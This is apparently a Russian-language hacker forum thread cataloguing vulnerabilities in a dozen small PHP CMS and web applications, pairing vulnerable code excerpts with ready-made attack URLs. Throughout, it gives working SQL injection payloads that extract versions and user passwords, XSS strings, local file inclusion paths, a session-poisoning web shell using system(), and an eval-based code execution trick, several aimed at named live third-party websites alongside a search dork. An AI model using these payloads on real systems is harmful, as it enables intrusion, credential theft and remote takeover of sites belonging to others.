Croogo 1.2 (Геморная маленько) Пассивная XSS /admin/filemanager/browse?path=%22%3E%3Cscript%3Ealert();%3C/script%3E Сработает на админе, если он авторизован. P.S. Залить шелл легко (права админа нужны) /admin/attachments Там я думаю догадаетесь.
Imer - Site Manager 3.5.0 sourceforge.net/projects/ism-imersiteman/ path disclosure http://localhost/imer/help/admin_common.php -------------- divcliente.php PHP: require_once './conecta.php'; require_once './suporte.php'; require_once './arrays.php'; if ($oplcat == '2'){ if ($ople == 'E'){ $pg_usuario = mysql_query("SELECT * FROM swb_usuarios WHERE ID = $idl LIMIT 1"); SQL rg=on http://localhost/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38,39,40,41,42,43+--+ http://www.trudelmer.com.br/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38,39,40,41,42,43+--+ -------------- noticia.php PHP: $pg_noticias = mysql_query("SELECT * FROM swb_noticias WHERE status = 'A' AND ID = $idl LIMIT 1"); SQL rg=on http://localhost/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12-- http://www.trudelmer.com.br/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12-- -------------- divhelp.php PHP: require_once './conecta.php'; require_once './suporte.php'; require_once './arrays.php'; if ($oplhlp == 'Y' || $oplhlp == 'N' || $oplhlp == 'R' || $oplhlp == 'L'){ if ($ople == 'E'){ $pg_userhelp = mysql_query("SELECT * FROM livehelp_users WHERE username = '$login' LIMIT 1"); SQL rg=on mq=off http://localhost/imer/divhelp.php?oplhlp=Y&ople=E&&login=hhhh'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40+limit+1+--+
PHP - STATS текущая версия 0.1.9.2 сайт: php-stats.com файл : downloads.php условия magic_quotes_gpc = off уязвимый код : PHP: $result=sql_query("SELECT nome,descrizione,type,home,size,downloads,withinterface FROM $option[prefix]_downloads WHERE id='$id'"); .............................................................................................................. if(($mode!='download' && $downloads_withinterface=='YES') || $errorDownload===true) { .......................................... else {а вот собственно тут уже и имеем вывод на экран} { использование : Code: http://localhost/php-stats/download.php?mode=downloadd&id=999999'+union+select+1,2,2,3,4,5,"YES"+from+information_schema.tables%23 Пример для сайта производителей: Code: http://php-stats.com/stat/download.php?mode=downloadd&id=999999'+union+select+1,version(),2,3,4,5,"YES"%23 P.S. 6-й столбец должен быть обязательно задан как "YES", иначе не будет вывода
GAzie - Gestione Aziendale v4.0.13 http://sourceforge.net/projects/gazie/ Finance application written in PHP using a MySql database backend for small to medium enterprise. It lets you write invoices, manage stock, manage orders , accounting, etc. Send tax receipt to electronic cash register. pXSS http://localhost/gazie/modules/root/login_admin.php post Login=1>'><script>alert(1212)</script> Password=111111 actionflag=Login ---------------- modules/root/login_admin.php PHP: if (isset ($_POST['actionflag'])) { // checkUser(); $result = gaz_dbi_get_row ($gTables['admin'], "Login", $_POST['Login']); if (!empty ($result['lang'])){ $lang = $result['lang']; } else { $lang = 'italian'; } require("./lang.".$lang.".php"); library/include/mysql.lib.php PHP: function gaz_dbi_get_row( $table, $fnm, $fval) { global $link; $result = mysql_query("SELECT * FROM $table WHERE $fnm = '$fval'", $link); if (!$result) die (" Error gaz_dbi_get_row: ".mysql_error()); return mysql_fetch_array( $result); } SQL+LFI mq=off http://localhost/gazie/modules/root/login_admin.php post Login=111'+union+select+1,2,3,"../../../../../../../../../../boot.ini%00",5,6,7,8,9,10,11,12,13+--+ Password=111111 actionflag=Login
Andy's PHP Knowledgebase v0.94.2 http://aphpkb.org/ forgot_password.php PHP: <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p> pXSS http://localhost/aphpkb/forgot_password.php post username=1>"><script%20%0a%0d>alert(121212)%3B</script> ------------------------------------------------------------- keysearch.php PHP: if($_REQUEST['keyword_list']){ $keyword_list = escdata($_REQUEST['keyword_list']); } else { $keyword_list = 'nothing'; } ... // If it's not the first page, make a Previous button. if ($current_page != 1) { echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start - $display) . '&np=' . $num_pages . '">Previous</a> '; } // Make all the numbered pages. for ($i = 1; $i <= $num_pages; $i++) { if ($i != $current_page) { echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . (($display * ($i - 1))) . '&np=' . $num_pages . '">' . $i . '</a> '; } else { echo $i . ' '; } } // If it's not the last page, make a Next button. if ($current_page != $num_pages) { echo '<a href="keysearch.php?keyword_list=' . $keyword_list . '&s=' . ($start + $display) . '&np=' . $num_pages . '">Next</a>'; } pXSS http://localhost/aphpkb/keysearch.php post keyword_list=1<script>alert(121212)</script> ------------------------------------------------------------- login.php PHP: <p>User Name:<br /><input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /></p> pXSS http://localhost/aphpkb/login.php post username=1>"><script%20%0a%0d>alert(121212)%3B</script> ------------------------------------------------------------- q.php PHP: $articledatae = escdata(xss_clean($_POST['article']) ); ... 
$articledata = stripslashes($articledatae); echo '<p>Article Details</p>'; echo "<p>Question:<br />$articledata</p>"; pXSS http://localhost/aphpkb/q.php post article=1<div+style+STYLE="width:expression(alert(121212))%3B">&aid=111&submit=Submit%20Question ------------------------------------------------------------- register.php PHP: <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <p>First Name:<br /> <input type="text" name="first_name" size="15" maxlength="15" value="<?php if (isset($_POST['first_name'])) echo $_POST['first_name']; ?>" /></p> <p>Last Name:<br /> <input type="text" name="last_name" size="30" maxlength="30" value="<?php if (isset($_POST['last_name'])) echo $_POST['last_name']; ?>" /></p> <p>Email Address:<br /> <input type="text" name="email" size="40" maxlength="40" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" /> </p> <p>User Name:<br /> <input type="text" name="username" size="10" maxlength="20" value="<?php if (isset($_POST['username'])) echo $_POST['username']; ?>" /> <small>Use only letters, numbers, and the underscore. Must be between 4 and 20 characters long.</small></p> pXSS http://localhost/aphpkb/register.php post first_name=1>"><script%20%0a%0d>alert(121212)%3B</script post last_name=1>"><script%20%0a%0d>alert(121212)%3B</script> post email=1>"><script%20%0a%0d>alert(121212)%3B</script> post username=1>"><script%20%0a%0d>alert(121212)%3B</script> ------------------------------------------------------------- saa.php PHP: $articledatae = escdata(xss_clean($_POST['article']) ); ... $articledata = stripslashes($articledatae); echo '<p>Article Details</p>'; if($titlee) { echo "<p>Title: $titlee</p>"; } echo "<p>Article:<br />$articledata</p>"; pXSS http://localhost/aphpkb/saa.php post article=1<div+style="width:expression(alert(121212))%3B">
Angora Guestbook v1.2.1 http://sourceforge.net/projects/aguestbook/ index.php PHP: // Language settings $langName = secureVar($_GET['l'], 'html'); if (! empty($langName)) $_SESSION['langName'] = $langName; if (empty($_SESSION['langName'])) $langName = $config['guestbookLang']; else $langName = $_SESSION['langName']; @include_once "languages/" . $langName . "/frontend.php"; classes/functions.php PHP: function secureVar($var, $type) { global $con; switch ($type) { case 'sql' : if (get_magic_quotes_gpc()) $var = stripslashes($var); if (function_exists("mysql_real_escape_string")) $var = mysql_real_escape_string($var); else $var = addslashes($var); break; case 'html' : $var = htmlspecialchars($var, ENT_QUOTES); break; default : if (get_magic_quotes_gpc()) $var = stripslashes($var); if (function_exists("mysql_real_escape_string")) $var = mysql_real_escape_string($var); else $var = addslashes($var); } return $var; } LFI mq=off http://localhost/angora_1_2_1/guestbook/index.php?l=../../../../../../../../boot.ini%00 ------------------------ admin/includes/content/phpinfo.php PHP: if (@$magic != "0xDEADBEEF") die("This file cannot be executed directly"); if (base64_decode($_SESSION['privilege']) != 1) { $error = new Error($lang['noPermission']); die($error->showError()); } ob_start(); phpinfo(); phpinfo http://localhost/angora_1_2_1/guestbook/admin/includes/content/phpinfo.php?magic=0xDEADBEEF&_SESSION[privilege]=MQ==
Продукт: mycroCMS Сайт: http://sourceforge.net/projects/mycrocms/ Path disclosure Code: [b]http://localhost/mycrocms/?entry_id='[/b] LFI Участок кода в /admin/admin.php: PHP: if ($admin=="error"){ include ("error.php"); }elseif ($userManager->isLoggedIn()) { if ($admin == "") { include ("dashboard.php"); } else { if (file_exists("admin/$admin.php")) { include ("admin/$admin.php"); } else { die("File admin/$admin.php does not exist!"); } } $userManager->setLastTime(time()); } else { if ($admin == "") { include ("dashboard.php"); } else { if (file_exists("admin/$admin.php")) { include ("admin/$admin.php"); } else { die("File admin/$admin.php does not exist!"); } } $userManager->setLastTime(time()); } Отсюда инклуд. Эксплуатация: Code: [b] http://localhost/mycrocms/?admin=../../../../../../etc/passwd%00 [/b] (права админа не нужны) SQL-Injection magic_quotes=Off Смотрим в \include\Categories.php: PHP: function get_category_by_id($id) { global $sql, $categories; // use array if preloaded if (is_array($categories)) { $res = array_search_recursive('category_id', $id, $categories); } if (!is_array($res[0])) { $res = $sql->read('categories', 'category_id', $id); } return $res[0]; } Теперь ищем метод read в классе sql. Весь код кидать не буду, но фильтрации там нет. PHP: $sql = "SELECT * FROM `$tablep` " . $where . $order . $limit; $result = mysql_query($sql); Пример эксплуатации: Code: [b] http://localhost/mycrocms/?cat_id=1'+and+row(1,1)%3E(select+count(*),concat(version(),0x3a,floor(rand()*2)) +x+from+mysql.user+group+by+x+limit+1)+and+'a'='a [/b] Code Execution Заливка шелла в админке. Идём в меню Plugins, там есть стандартный плагин second для редактирования шаблонов (а на деле - любых файлов). Активируем его, затем идём на http://localhost/mycrocms/?plugin=second&page=themes и редактируем любой файл.
Pyrophobia CMS Product : http://sourceforge.net/projects/pyrophobia/ Version : Pyrophobia CMS 2.1.3.1 Active XSS 1. Forum -- заходим в форум -- отправляем сообщение с текстом ( "><script>alert("xss");</script> ) 2. PM -- Send User a PM -- отправляем текст ( '"/><script>alert("xss");</script> ) SQL injection MySQL Version : 5.0.45 --- Code: http://localhost/[version]/?act=downloads/browsecategory&cat=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 Code: http://localhost/[version]/index.php?act=UCP&CODE=02&mssg=3'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1 На данном движке их много LFI milw0rm
BrewBlogger v2.3.1 http://www.brewblogger.net/ path disclosure http://localhost/brewblogger/includes/plug-ins.inc.php ---------------------- index.php PHP: //image dir / SQL information and connect to MySQL server require_once ('Connections/config.php'); //choose SQL table and set up functions to user authentication and //navbar configuration for login/logout links require ('includes/authentication_nav.inc.php'); session_start(); includes\authentication_nav.inc.php $query_user = sprintf("SELECT * FROM users WHERE user_name = '%s'", $loginUsername); $user = mysql_query($query_user, $brewing) or die(mysql_error()); $row_user = mysql_fetch_assoc($user); $totalRows_user = mysql_num_rows($user); Blind SQL mq=off http://localhost/brewblogger/index.php?loginUsername='+UNION+SELECT+(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a)+--+ ----------------------- includes/db_connect_log.inc.php PHP: /* set pagination variables */ if ($view == "limited") $display = 25; elseif ($view == "all") $display = 9999999; $pg = (isset($_REQUEST['pg']) && ctype_digit($_REQUEST['pg'])) ? 
$_REQUEST['pg'] : 1; $start = $display * $pg - $display; if (($row_pref['mode'] == "1") || (($row_pref['mode'] == "2") && ($filter == "all"))) { mysql_select_db($database_brewing, $brewing); $query_result = "SELECT count(*) FROM brewing"; if ($style != "all") $query_result .= " WHERE brewStyle='$style' AND"; else $query_result .= " WHERE"; $query_result .= " NOT brewArchive='Y'"; $result = mysql_query($query_result, $brewing) or die(mysql_error()); $total = mysql_result($result, 0); $query_log = "SELECT * FROM brewing"; if ($style != "all") $query_log .= " WHERE brewStyle='$style' AND"; else $query_log .= " WHERE"; $query_log .= " NOT brewArchive='Y'"; $query_log .= " ORDER BY $sort $dir LIMIT $start, $display"; $sort слешируется ранее, PHP: includes/url_variables.inc.php $sort = "brewDate"; if (isset($_GET['sort'])) { $sort = (get_magic_quotes_gpc()) ? $_GET['sort'] : addslashes($_GET['sort']); } $display никак не фильтруется. Хочется получить limit union select но мешает order by, поэтому только Blind SQL http://localhost/brewblogger/index.php?page=brewBlogList&&sort=(select+*+from(select+*+from(select+name_const((version()),1)d)+as+t+join+(select+name_const((version()),1)e)b)a) ---------------------- sections.entry.inc.php PHP: $dbTable = "brewing"; if (isset($_GET['dbTable'])) { $dbTable = (get_magic_quotes_gpc()) ? $_GET['dbTable'] : addslashes($_GET['dbTable']); } if ($action == "default") { $style = "default"; if (isset($_GET['style'])) { $style = (get_magic_quotes_gpc()) ? 
$_GET['style'] : addslashes($_GET['style']); } } else $style = $_POST['style']; if (($action == "verify") || ($action == "print")) { $name = $_POST['name']; $address = $_POST['address']; $city = $_POST['city']; $state = $_POST['state']; $zip = $_POST['zip']; $homePhone = $_POST['homePhone']; $workPhone = $_POST['workPhone']; $email = $_POST['email']; $brewClub = $_POST['brewClub']; $brewName = $_POST['brewName']; $still = $_POST['still']; $dry = $_POST['dry']; $hydromel = $_POST['hydromel']; $petillant = $_POST['petillant']; $semi = $_POST['semi']; $standard = $_POST['standard']; $sweet = $_POST['sweet']; $sparkling = $_POST['sparkling']; $sack = $_POST['sack']; $special = $_POST['special']; $waterTreatment = $_POST['waterTreatment']; $yeastLiquid = $_POST['yeastLiquid']; $yeastDried = $_POST['yeastDried']; $starter = $_POST['starter']; $yeastNutrients = $_POST['yeastNutrients']; $carbonation = $_POST['carbonation']; $volumeC02 = $_POST['volumeC02']; $primingSugar = $_POST['primingSugar']; $bottlingDate = $_POST['bottlingDate']; $finingsType = $_POST['finingsType']; $finingsAmount = $_POST['finingsAmount']; } mysql_select_db($database_brewing, $brewing); $query_log = sprintf("SELECT * FROM $dbTable WHERE id = '%s'", $id); $log = mysql_query($query_log, $brewing) or die(mysql_error()); $row_log = mysql_fetch_assoc($log); $totalRows_log = mysql_num_rows($log); $query_style1 = sprintf("SELECT * FROM styles WHERE brewStyle = '%s'", $style); SQL mq=off http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default post style=-1' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex(hex(concat_ws(0x3a,user_name,password))) from users -- pXSS для полей name address city state zip homePhone workPhone email brewClub brewName still dry hydromel petillant semi standard sweet sparkling sack special waterTreatment yeastLiquid yeastDried starter yeastNutrients carbonation volumeC02 primingSugar bottlingDate finingsType finingsAmount по 
типу http://localhost/brewblogger/sections/entry.inc.php?action=verify&style=default&id=default post city=<script>alert(121212)</script>
php-addressbook v5.4.6 - r276 http://sourceforge.net/projects/php-addressbook/ group.php PHP: echo "<div class='msgbox'>Users added.<br /><i>Go to <a href='./?group=$group_name'>group page \"$group_name\"</a>.</i></div>"; ... <form accept-charset="utf-8" method="post" action="<?php echo $_SERVER['PHP_SELF'];?>"> pXSS http://localhost/addressbookv5.4.6/index.php?group=1<script>alert(121212)</script> pXSS mq=off http://localhost/addressbookv5.4.6/group.php/>"><script>alert(121212)</script> --------------------- include/dbconnect.php PHP: $get_vars = array( 'id' ); foreach($get_vars as $get_var) { if(isset($_GET[$get_var])) { ${$get_var} = intval($_GET[$get_var]); } elseif(isset($_POST[$get_var])) { ${$get_var} = intval($_POST[$get_var]); } else { ${$get_var} = null; } } echo $id, "<br />"; // Copy only used variables into global space. $get_vars = array( 'searchstring', 'alphabet', 'group', 'resultnumber' , 'submit', 'update', 'delete' , 'new', 'add', 'remove', 'edit' ); foreach($get_vars as $get_var) { if(isset($_GET[$get_var])) { ${$get_var} = mysql_real_escape_string($_GET[$get_var], $db); } elseif(isset($_POST[$get_var])) { ${$get_var} = mysql_real_escape_string($_POST[$get_var], $db); } else { ${$get_var} = null; } } ... // To run the script on systeme with "register_globals" disabled, // import all variables in a bit secured way: Remove HTML Tags foreach($_REQUEST as $key => $value) { // Allow all tags in headers and footers if($key == "group_header" || $key == "group_footer"){ ${$key} = $value; // Handle arrays } elseif(is_array($value)) { foreach($value as $entry) { ${$key}[] = strip_tags($entry); } // Handle the rest } else { // ${$key} = htmlspecialchars($value); --chatelao-20071121, doesn't work with Chinese Characters ${$key} = strip_tags($value); } // TBD: prevent SQL-Injection } ... 
// ------------------- Group query handling ------------------------ // $select_groups = "SELECT groups.* , parent_groups.group_name parent_name , parent_groups.group_id parent_id FROM $table_groups AS groups LEFT JOIN $table_groups AS parent_groups ON groups.group_parent_id = parent_groups.group_id"; group.php PHP: // Open for Editing else if($edit || $id) { if($edit) $id = $selected[0]; if(! $read_only) { $result = mysql_query("$select_groups WHERE groups.group_id=$id",$db); SQL http://localhost/addressbookv5.4.6/group.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9+--+ ------------------------- edit.php PHP: else if($id) { if(! $read_only) { $result = mysql_query("SELECT * FROM $base_from_where AND $table.id=$id",$db); SQL http://localhost/addressbookv5.4.6/edit.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
cms chicomas Ver : 2.0.4 http://sourceforge.net/projects/chicomas/ functions.php PHP: function SetLanguage() { global $defaultlanguage; $obj_language = new CLanguage(); $obj_languagearray = new CLanguageArray(); $obj_languageengine = new CLanguageEngine(); if (!$_REQUEST['lang']){ // No change request of language if (!session_is_registered("lang")){ //No Registered $lang = $defaultlanguage; session_register("lang"); $_SESSION['lang'] = $lang; } else{ //Registered } } else{ //Change request of language $lang = $_REQUEST['lang']; $obj_language = $obj_languageengine->GetLanguage($lang); if ($obj_language!=null){ if (session_is_registered("lang")){ $_SESSION['lang'] = $lang; } else{ if ($lang =="") $lang = $defaultlanguage; session_register("lang"); } } } $lang = $_SESSION['lang']; switch (strtolower($lang)){ default: case "tr": $charset = "iso-8859-9"; break; case "en": $charset = "iso-8859-1"; break; case "de": $charset = "iso-8859-1"; break; } if (session_is_registered("charset")){ $_SESSION['charset'] = $charset; } else{ if ($charset =="") $charset = "iso-8859-9"; session_register("charset"); } //Include Language File include("languages/".strtolower($_SESSION['lang'])."/language.php"); } Если $obj_language = $obj_languageengine->GetLanguage($lang); вернет не пустой результат, значение $lang = $_REQUEST['lang']; занесется в сессию и затем проинклудится include("languages/".strtolower($_SESSION['lang'])."/language.php"); смотрим objects/obj_languages.php PHP: class CLanguageEngine { function GetLanguages($active){ $o_dataaccess = new CDataAccess(); return $o_dataaccess->GetLanguages($active); objects/obj_dataaccess.php PHP: function GetLanguage($lang) { $sql = "SELECT * FROM languages "; $sql .= "WHERE lang='".strtolower($lang)."' "; $sql .= "AND active='1'"; //echo "SQL:".$sql."<br>"; $db = new db(); $db->db_connect(); if ($db->is_connected()){ $db->db_query($sql); while ($row = $db->get_row()) { $o_language = new CLanguage($row); } $db->db_disconnect(); } return 
$o_language; } при mq=off SQL http://localhost/chicomas/index.php?lang=en'+union+select+1,2,3,4,version(),6+--+ SQL+LFI http://localhost/chicomas/index.php?lang=/../../../../../../../boot.ini%00'+union+select+1,2,3,4,5,6+--+ Shell если нашли сессию, получаем шелл, например так: (используем два разных браузера) opera, заливаем шелл в сессию http://localhost/chicomas/index.php?lang='+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,5,6+--+ firefox, инклудим сессию http://localhost/chicomas/index.php?lang=/../../../../../../../Server/PHP/TMP/sess_be2c81ce822253b08bfa181ee5b7cf9d%00'+union+select+1,<?if($_GET[pass])system($_GET[pass]);?>,3,4,version(),6+--+&pass=dir ------------------- tools/mysqlbackuppro/index.php PHP: /* * Locale Setting */ $locale = gonxlocale::init(); if (!isset($locale) or $locale=="") { $locale = $GonxAdmin["locale"]; } require_once("locale/".$locale.".php"); tools/mysqlbackuppro/libs/locale.class.php PHP: class gonxlocale{ /** * Constructor * @access protected */ function locale(){ } /** * * @access public * @return void **/ function init(){ global $locale,$GonxAdmin,$HTTP_SESSION_VARS; if (session_is_registered('gonxlocale') and !isset($_GET["locale"])) { $locale = $HTTP_SESSION_VARS["gonxlocale"]; } elseif (!isset($_GET["locale"])) { $locale = $GonxAdmin["locale"]; session_register('gonxlocale'); $gonxlocale = $locale; } elseif (isset($_GET["locale"])) { if (is_file("locale/".$_GET["locale"].".php")) { session_register('gonxlocale'); $HTTP_SESSION_VARS["gonxlocale"] = $_GET["locale"]; } } return $locale; } LFI mq=off http://localhost/chicomas/tools/mysqlbackuppro/index.php?locale=../../../../../../boot.ini%00
AdaptCMS Lite v1.5 - NEW www.adaptcms.com pXSS mq=off http://localhost/adaptcms_lite_1.5/index.php post skin=1>"><script>alert(121212);</script> http://localhost/adaptcms_lite_1.5/?cat=1'+><script>alert(121212);</script> http://localhost/adaptcms_lite_1.5/index.php?view=redirect&url=1'+><script>alert(121212);</script> http://localhost/adaptcms_lite_1.5/index.php/>'><script>alert(121212)</script> ----------------------- index.php PHP: $_GET['id'] = str_replace("/","",stripslashes(check($_GET['id']))); $sql = mysql_query("SELECT * FROM ".$pre."pages WHERE url = '".$_GET['id']."'"); functions.php PHP: function check($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script> // note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs $val = preg_replace('/([\x00-\x08][\x0b-\x0c][\x0e-\x20])/', '', $val); // straight replacements, the user should never need these since they're normal characters // this prevents like <IMG SRC=@avascript:alert('XSS')> $search = 'abcdefghijklmnopqrstuvwxyz'; $search .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; $search .= '1234567890!@#$%^&*()'; $search .= '~`";:?+/={}[]-_|\'\\'; for ($i = 0; $i < strlen($search); $i++) { // ;? 
matches the ;, which is optional // 0{0,7} matches any padded zeros, which are optional and go up to 8 chars // @ @ search for the hex values $val = preg_replace('/(&#[x|X]0{0,8}'.dechex(ord($search[$i])).';?)/i', $search[$i], $val); // with a ; // @ @ 0{0,7} matches '0' zero to seven times $val = preg_replace('/(&#0{0,8}'.ord($search[$i]).';?)/', $search[$i], $val); // with a ; } // now the only remaining whitespace attacks are \t, \n, and \r $ra1 = Array('javascript', 'vbscript', 'expression', 'applet', 'meta', 'xml', 'blink', 'link', 'style', 'script', 'embed', 'object', 'iframe', 'frame', 'frameset', 'ilayer', 'layer', 'bgsound', 'title', 'base', 'img'); $ra2 = Array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'); $ra = array_merge($ra1, $ra2); $found = true; // keep replacing as long as the previous round replaced something while ($found == true) { $val_before = $val; for ($i = 0; $i < 
sizeof($ra); $i++) { $pattern = '/'; for ($j = 0; $j < strlen($ra[$i]); $j++) { if ($j > 0) { $pattern .= '('; $pattern .= '(&#[x|X]0{0,8}([9][a][b]);?)?'; $pattern .= '|(&#0{0,8}([9][10][13]);?)?'; $pattern .= ')?'; } $pattern .= $ra[$i][$j]; } $pattern .= '/i'; $replacement = substr($ra[$i], 0, 2).'<x>'.substr($ra[$i], 2); // add in <> to nerf the tag $val = preg_replace($pattern, $replacement, $val); // filter out the hex tags if ($val_before == $val) { // no replacements were made, so exit the loop $found = false; } } } return strip_tags($val, "<p><a><font><b><i><u><span><em><div><li><ul><ol><center><blockquote>"); } SQL mq=off http://localhost/adaptcms_lite_1.5/?view=page&id=-1'+union+select+1,user(),3,version(),5,6+--+ ------------------------------------- index.php PHP: ... if ($_GET['field'] or $_GET['data']) { $sql = mysql_query("SELECT * FROM ".$pre."fielddata WHERE".$fddata." ORDER BY `id` DESC".$lim); } else { if ($_GET['abc']) { if ($_GET['cat']) { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim); } else { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = '' ".$abc.$adate."ORDER BY `id` DESC".$lim); } } else { if ($_GET['cat']) { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE section = '".$_GET['cat']."' AND ver = ''".$adate." ORDER BY `id` DESC".$lim); } else { $sql = mysql_query("SELECT * FROM ".$pre."articles WHERE ver = ''".$adate." ORDER BY `id` DESC".$lim); } } } while($r = mysql_fetch_array($sql)) { unset($data, $datas, $pab, $rab, $name1, $link1, $n, $m, $y, $x, $i, $id, $name, $relations_id, $relations_sec, $s, $fetch, $get, $dats, $fname, $lid, $lids, $b, $sqlst, $k, $data23, $check); ... $pab[0] = "{link}"; $pab[1] = "{date}"; $pab[2] = "{story}"; $pab[3] = "{comments}"; $pab[4] = "{cnum}"; $pab[5] = "{pcomment}"; $pab[6] = "{author}"; $pab[7] = "{section}"; $pab[8] = "{cat}"; $pab[9] = "{url}"; $pab[10] = "{title}"; .... 
$pab[30] = "{".$r[section]."_name}"; $pab[31] = "{".$r[section]."_username}"; $pab[32] = "{".$r[section]."_id}"; $pab[33] = "{".$r[section]."_views}"; $pab[34] = "{".$r[section]."_votes}"; $pab[35] = "{".$r[section]."_social_icons}"; ... // start - custom fields $name = "";$data = "";$row = ""; $sql_cf = mysql_query("SELECT * FROM ".$pre."fields WHERE cat = '".$r[section]."' OR cat = 'user-profile'"); while ($row = mysql_fetch_array($sql_cf)) { $name = "$row[name]"; $data = mysql_fetch_row(mysql_query("SELECT data FROM ".$pre."fielddata WHERE fname = '".$name."' AND aid = '".$r[id]."'")); $fdata[$name] = $data[0]; if ($data[0]) { $n = $n + 1; $pab[$n] = "{".$name."}"; $n = $n + 1; $pab[$n] = "{".$r[section]."_".$name."}"; $m = $m + 1; if ($row[type] == "textarea") { $rab[$m] = parse_text($data[0]); $m = $m + 1; $rab[$m] = parse_text($data[0]); } else { $rab[$m] = stripslashes(html_entity_decode($data[0])); $m = $m + 1; $rab[$m] = stripslashes(html_entity_decode($data[0])); } } else { $n = $n + 1; $pab[$n] = "{".$name."}"; $n = $n + 1; $pab[$n] = "{".$r[section]."_".$name."}"; $m = $m + 1; $rab[$m] = ""; $m = $m + 1; $rab[$m] = ""; } } // end - custom fields ... eval (" ?>" . str_replace($pab, $rab, stripslashes($temp[0])) . " <?php "); ... Выбирается шаблон ($temp[0]) и в нем поля (массив $pab) заменяются на конкретное содержание (массив $rab). Чтобы выполнить свою команду, нужно добавить в массивы по элементу, где $pab[400] = "{cat}"; ( такое поле есть в шаблоне $temp[0] ) $rab[400] = "php code"; (наша команда или скрипт) этому препятствует unset unset($data, $datas, $pab, $rab, ...); Приходится использовать unset багу. 
сформируем hash_del_key для php5 для pab = 2090607416 для rab = 2090679290 Eval register_globals = On версия php, уязвимая для UNSET WHACKING http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090607416[400]=1&2090679290[400]=1 http://localhost/adaptcms_lite_1.5/?view=list&pab[400]=cat&rab[400]=<?php phpinfo(); ?>&2090679290=1
cms jetbox http://sourceforge.net/projects/jetboxone/ dork:"Powered by Jetbox CMS ™" Поддерживает УРЛ стандартного типа, но работает со своим PHP: if ($use_standard_url_method==true) { $url = explode("/",$url_to_split[1]); // Splits URL into array --------------------------- phpinfo http://localhost/jetbox/includes/phpinfo.php http://www.js.mlc.edu.tw/php/jetbox/includes/phpinfo.php --------------------------- index.php PHP: if (isset($view)) { $dodefaultpage=false; $sql2="SELECT * FROM navigation WHERE view_name='".$view."'"; $r2 = mysql_prefix_query($sql2) or die(mysql_error()." q: ".$sql2."<br /> Line: ".__LINE__." <br/>File: ".__FILE__); if ($ra2 = mysql_fetch_array($r2)){ //echo $ra2["file_name"]; include($ra2["file_name"]); } SQL+LFI mq=off rg=on http://localhost/jetbox/?view=1'+union+select+1,"/boot.ini%",3,4,5,6,7,8,9,10,11,12+--+ http://www.egyptiancorner.org/ec/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6,7,8,9,10,11,12+--+ SQL+RFI magic_quotes_gpc = Off register_globals = On 